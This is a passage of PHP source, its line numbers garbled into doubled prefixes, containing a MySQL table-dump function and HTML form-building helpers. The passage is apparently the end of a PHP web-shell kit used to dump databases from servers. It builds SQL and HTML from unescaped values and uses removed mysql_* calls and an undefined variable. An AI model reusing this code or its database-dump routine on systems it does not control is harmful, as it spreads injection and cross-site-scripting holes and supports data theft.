19941994 // Dump mysql
19951995 function sqldumptable($table, $fp = 0) {
19961996 $tabledump = "DROP TABLE IF EXISTS $table;\n";
19971997 $tabledump.= "CREATE TABLE $table (\n";
19981998 $firstfield = 1;
19991999 $fields = q("SHOW FIELDS FROM $table");
20002000 while ($field = mysql_fetch_array($fields)) {
20012001 if (!$firstfield) {
20022002 $tabledump.= ",\n";
20032003 } else {
20042004 $firstfield = 0;
20052005 }
20062006 $tabledump.= " $field[Field] $field[Type]";
20072007 if (!empty($field["Default"])) {
20082008 $tabledump.= " DEFAULT '$field[Default]'";
20092009 }
20102010 if ($field['Null'] != "YES") {
20112011 $tabledump.= " NOT NULL";
20122012 }
20132013 if ($field['Extra'] != "") {
20142014 $tabledump.= " $field[Extra]";
20152015 }
20162016 }
20172017 fr($fields);
20182018 $keys = q("SHOW KEYS FROM $table");
20192019 while ($key = mysql_fetch_array($keys)) {
20202020 $kname = $key['Key_name'];
20212021 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
20222022 $kname = "UNIQUE|$kname";
20232023 }
20242024 if (!is_array($index[$kname])) {
20252025 $index[$kname] = array();
20262026 }
20272027 $index[$kname][] = $key['Column_name'];
20282028 }
20292029 fr($keys);
20302030 while (list($kname, $columns) = @each($index)) {
20312031 $tabledump.= ",\n";
20322032 $colnames = implode($columns, ",");
20332033 if ($kname == "PRIMARY") {
20342034 $tabledump.= " PRIMARY KEY ($colnames)";
20352035 } else {
20362036 if (substr($kname, 0, 6) == "UNIQUE") {
20372037 $kname = substr($kname, 7);
20382038 }
20392039 $tabledump.= " KEY $kname ($colnames)";
20402040 }
20412041 }
20422042 $tabledump.= "\n);\n\n";
20432043 if ($fp) {
20442044 fwrite($fp, $tabledump);
20452045 } else {
20462046 echo $tabledump;
20472047 }
20482048 $rows = q("SELECT * FROM $table");
20492049 $numfields = mysql_num_fields($rows);
20502050 while ($row = mysql_fetch_array($rows)) {
20512051 $tabledump = "INSERT INTO $table VALUES(";
20522052 $fieldcounter = - 1;
20532053 $firstfield = 1;
20542054 while (++$fieldcounter < $numfields) {
20552055 if (!$firstfield) {
20562056 $tabledump.= ", ";
20572057 } else {
20582058 $firstfield = 0;
20592059 }
20602060 if (!isset($row[$fieldcounter])) {
20612061 $tabledump.= "NULL";
20622062 } else {
20632063 $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
20642064 }
20652065 }
20662066 $tabledump.= ");\n";
20672067 if ($fp) {
20682068 fwrite($fp, $tabledump);
20692069 } else {
20702070 echo $tabledump;
20712071 }
20722072 }
20732073 fr($rows);
20742074 if ($fp) {
20752075 fwrite($fp, "\n");
20762076 } else {
20772077 echo "\n";
20782078 }
20792079 }
20802080 function ue($str) {
20812081 return urlencode($str);
20822082 }
20832083 function p($str) {
20842084 echo $str . "\n";
20852085 }
20862086 function tbhead() {
20872087 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
20882088 }
20892089 function tbfoot() {
20902090 p('</table>');
20912091 }
20922092 function makehide($name, $value = '') {
20932093 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
20942094 }
20952095 function makeinput($arg = array()) {
20962096 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
20972097 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
20982098 !$arg['type'] && $arg['type'] = 'text';
20992099 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
21002100 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
21012101 if ($arg['newline']) {
21022102 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
21032103 } else {
21042104 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
21052105 }
21062106 }
21072107 function makeselect($arg = array()) {
21082108 if ($arg['onchange']) {
21092109 $onchange = 'onchange="' . $arg['onchange'] . '"';
21102110 }
21112111 $arg['title'] = $arg['title'] ? $arg['title'] : '';
21122112 if ($arg['newline']) p('<p>');
21132113 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
21142114 if (is_array($arg['option'])) {
21152115 foreach ($arg['option'] as $key => $value) {
21162116 if ($arg['selected'] == $key) {
21172117 p("<option value=\"$key\" selected>$value</option>");
21182118 } else {
21192119 p("<option value=\"$key\">$value</option>");
21202120 }
21212121 }
21222122 }
21232123 p("</select>");
21242124 if ($arg['newline']) p('</p>');
21252125 }
21262126 function formhead($arg = array()) {
21272127 !$arg['method'] && $arg['method'] = 'post';
21282128 !$arg['action'] && $arg['action'] = $self;
21292129 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
21302130 !$arg['name'] && $arg['name'] = 'form1';
21312131 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
21322132 if ($arg['title']) {
21332133 p('<h2>' . $arg['title'] . ' »</h2>');
21342134 }
21352135 }
21362136 function maketext($arg = array()) {
21372137 !$arg['cols'] && $arg['cols'] = 100;
21382138 !$arg['rows'] && $arg['rows'] = 25;
21392139 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
21402140 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
21412141 }
21422142 function formfooter($name = '') {
21432143 !$name && $name = 'submit';
21442144 p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
21452145 p('</form>');
21462146 }
21472147 function formfoot() {
21482148 p('</form>');
21492149 }
21502150 // Exit
21512151 function pr($a) {
21522152 echo '<pre>';
21532153 print_r($a);
21542154 echo '</pre>';
21552155 }
21562156 ?>